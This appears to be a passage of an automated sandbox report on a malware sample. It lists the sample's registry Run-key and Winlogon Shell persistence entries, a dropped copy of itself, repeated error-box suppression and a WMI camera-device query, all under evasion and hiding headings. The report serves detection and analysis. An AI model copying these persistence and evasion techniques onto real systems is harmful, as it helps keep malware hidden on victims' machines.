                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\BuKwfPUT.log

                          Boot Survival

                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD

                          Hooking and other Techniques for Hiding and Protection

                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
